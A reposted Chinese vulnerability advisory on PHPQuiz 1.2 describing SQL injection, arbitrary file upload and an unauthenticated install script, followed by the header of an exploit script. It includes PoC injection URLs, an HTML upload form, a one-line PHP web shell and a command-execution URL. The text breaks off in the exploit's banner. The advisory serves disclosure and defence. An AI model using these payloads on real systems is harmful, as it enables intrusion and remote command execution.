[转载]PHPQuiz多个输入验证漏洞

信息来源：绿盟科技

PHPQuiz多个输入验证漏洞

发布日期：2006-09-16
更新日期：2006-09-20

受影响系统：
PHPQuiz PHPQuiz <= 1.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 20065

PHPQuiz是用PHP编写的在线考试/测验系统。

PHPQuiz的score.php脚本没有正确验证univers参数的输入，home.php脚本没有正确验证quiz_id参数的输入，允许攻击者执行SQL注入攻击。

此外，PHPQuiz的back/upload_img.php文件没有正确验证path参数的输入，允许攻击者上传恶意的PHP脚本。

<*来源：Simo64 （simo64@morx.org）
  
  链接：http://secunia.com/advisories/22015/
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

######################################################
#
# Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit
# Vendor  : PHPQuiz
# webiste : http://www.phpquiz.com
# Version : <= v.1.2
# Severity: Critical
# Author: Simo64 / simo64_at_morx_org
# MorX Security Reseach Team
# http://www.morx.org
# http://www.morx.org/phpquiz.txt
#
#  Details :
#
# SQL injection in score.php
#***************************
#
#  univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query
#
#  PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL]
#       http://localhost/phpquiz/front/? ... step=1&quiz_id=[SQL]
#
# Arbitary File Upload
#**********************
# vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76
#
#  74  if (($upload) && ($ok_update == "yes")) {
#  75
#  76  if(@copy($image, $path)){
#  77  .....
#
# $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files
#
#  PoC Exploit :
#
#  <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/up ... ./img_quiz/l3ez.php">
#  Download File<br>
#  <input name="image" type="file" size="20"><br>
#  <input type="submit" name="upload" value="Upload"><form>
#
#  phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell <?passthru($cmd);?>
#
#  we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls
#
# PHP Code Injection
#********************
#
# cfgphpquiz/install.php is accessible without authentification , the script is used to
# save configuration setting in config.inc.php.
#
# Impact:
# any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information # such as admin password (plain text) and login
#
#***********************************************************************************
#
# simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1
#
# /-----------------------------------------------------------\
# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit |
# |        Coded by simo64 - simo64_morx.org          |
# |               www.morx.org                 |
# |-----------------------------------------------------------|
# |     MorX Security Research Team